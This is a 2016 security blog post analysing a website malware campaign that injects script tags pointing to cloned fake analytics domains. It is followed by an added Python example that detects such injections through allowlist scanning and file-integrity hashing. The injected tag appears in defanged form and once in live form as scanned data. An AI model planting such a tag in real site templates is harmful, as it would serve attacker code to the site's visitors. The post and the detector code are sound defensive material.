Realstatistics Malware Campaign Uses Fake Analytics Sites

July 8, 2016 · Denis Sinegubko


In this post we’ll show you the tactics employed by the realstatistics malware campaign to make their injections seem less suspicious.

The injection looks like this:

<script language="JavaScript" type="text/JavaScript" src="hxxp://realstatistics[.]pro/js/analytics.php?id=123"></script>

The URL appears to be a typical statistics/analytics script: both the domain name and the URL path look relevant.

The injection is not encoded or obfuscated in any way. Although this campaign typically infects template .php files, what it writes into them is the same plain HTML tag you see above: no encoding, no obfuscation, and no dynamic script loading. The idea is to make the tag look as if it really belongs in the page template, precisely because it avoids the dirty tricks that usually give injected malware away.

Pretending to Be Real Analytics Sites

What happens if a webmaster is still not convinced and wants to check if the realstatistics[.]pro site really provides some analytical services? If you open the site now (with Safe Browsing warnings turned off) you’ll see this:

[Screenshot: realstatistics[.]pro fake analytics site]
This looks like a real service that has something to do with analytics, advertising, and optimization. But wait! Why does it say wywy? It turns out that realstatistics[.]pro is just a clone of the site of the real German company wywy GmbH, which provides automated content recognition solutions for advertising, analytics, and optimization.

Realstatistics[.]pro is not the only domain used by this malware campaign. The attackers have registered quite a few similar domains. For example, realanalytics[.]pro also displays the wywy clone site.

There are also clones of other analytics websites. Siteanalytics[.]pro is a poor clone of the site for the Dutch OpenTracker service.

[Screenshot: siteanalytics[.]pro cloned fake analytics site]

Webstatistics[.]pro is a clone of EasyVisitors.

[Screenshot: webstatistics[.]pro, yet another cloned analytics site]

If you don't pay attention to details, you can be fooled into thinking that these domains provide legitimate services. Of course, Google's Safe Browsing warning helps reveal the malicious nature of the sites. Unfortunately, not all of them are blacklisted by Google, so you will not see any warning if you visit some of them right now, and you will see nothing at all in browsers that don't use Google's Safe Browsing data. A missing warning is therefore no evidence that a domain is clean.

By the way, the server that hosts the realstatistics sites is also known for hosting fake update sites, such as adobesecurupdate[.]com and microsoft-securety[.]com:

[Screenshot: the same server hosting several other fake sites]

Conclusion

Although the Realstatistics malware campaign goes the extra mile to make its injections look less suspicious, it is still quite easy to spot with website monitoring and file integrity monitoring: a tag that was not there yesterday is a change, however innocent it looks.

When you see some added code, you don’t have to check whether it’s benign or malicious. All you should do is ask yourself if this code was added by you (or by someone else responsible for the site updates). If not, it doesn’t matter what the code does – its presence means that it was an unauthorized modification and you need to investigate how it happened and assess the damage.
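As an added example (not code from the post or from Sucuri), the following Python script demonstrates the two checks discussed above: it lists every external <script src> host found in a set of template files and flags the ones that are not on an explicit allowlist, and it compares SHA-256 hashes of those files against a baseline taken while the site was known-good, so an unauthorized modification shows up regardless of what the added code does. The template files, the allowlist and the baseline are constructed inside the script (they are assumptions for the example, not real site data); the injected tag is the one quoted at the top of the post, written as a plain string and never fetched.

```python
"""Template scan and file-integrity check for plain script-tag injections.

Added example, not code from the Sucuri post. Two offline checks a site
owner can run against a copy of the template files:
  1. list every external <script src> host and flag hosts nobody approved;
  2. compare SHA-256 hashes with a known-good baseline to catch any change.
All sample files, the allowlist and the baseline are constructed here.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Hosts the site owner deliberately included (assumption for the example;
# a real list comes from the site's own templates and plugin documentation).
ALLOWED_SCRIPT_HOSTS = frozenset({"www.google-analytics.com", "cdn.example.org"})

# src attribute of a <script> tag, quoted or unquoted.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# Absolute (http/https) or protocol-relative URL -> hostname.
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.IGNORECASE)


def external_script_hosts(html: str) -> list[str]:
    """Hostname of every absolute script src in the HTML, in document order."""
    hosts = []
    for src in SCRIPT_SRC_RE.findall(html):
        m = HOST_RE.match(src)
        if m:  # relative paths such as /wp-includes/x.js are local, skip them
            hosts.append(m.group(1).lower())
    return hosts


def unexpected_script_hosts(html: str, allowed=ALLOWED_SCRIPT_HOSTS) -> list[str]:
    """Hosts the page loads scripts from that are not on the allowlist."""
    return sorted({h for h in external_script_hosts(html) if h not in allowed})


def hash_tree(root: Path, patterns=("*.php", "*.html", "*.js")) -> dict[str, str]:
    """SHA-256 of every template file under root, keyed by relative path."""
    digests = {}
    for pattern in patterns:
        for path in root.rglob(pattern):
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_baseline(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Files added, removed or modified since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


# The tag quoted in the post, as a plain string. It is only scanned, never fetched.
INJECTED_TAG = ('<script language="JavaScript" type="text/JavaScript" '
                'src="http://realstatistics.pro/js/analytics.php?id=123"></script>')


def demo() -> dict:
    """Build a constructed two-file theme, baseline it, inject the tag, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        header = root / "header.php"
        (root / "footer.php").write_text('<?php wp_footer(); ?>\n</body></html>\n')
        header.write_text(
            '<?php wp_head(); ?>\n'
            '<script src="https://www.google-analytics.com/analytics.js"></script>\n')
        baseline = hash_tree(root)  # taken while the site is known-good

        # Simulate the campaign: the plain, unobfuscated tag appended to a template.
        header.write_text(header.read_text() + INJECTED_TAG + "\n")

        changes = diff_baseline(baseline, hash_tree(root))
        # Only the files that changed need a human look; report unknown hosts in them.
        flagged = {rel: unexpected_script_hosts((root / rel).read_text())
                   for rel in changes["modified"]}
        return {"changes": changes, "flagged_hosts": flagged}


if __name__ == "__main__":
    print(demo())
```

The integrity check is the one that matters: the allowlist only explains *why* a change is suspicious, while the hash comparison catches it even if the attacker had cloned a domain you happened to trust. Keep the baseline somewhere the web server cannot write to, and regenerate it only after a deliberate, reviewed update.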

And of course, as a webmaster you should invest some time in getting familiar with the internals of your site, so that you can always tell what belongs to your site and what doesn't.


Categories: Security Advisory, Website Malware Infections. Tags: Malware Updates, Obfuscation, Phishing

About Denis Sinegubko

Denis Sinegubko is Sucuri's Senior Malware Researcher, who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn't analyzing malware, you might not find him online at all. Connect with him on Twitter.

Comments

  1. karate_coyote

    July 21, 2016

    Do we know where this malware originated from?

© 2022 Sucuri Inc. All rights reserved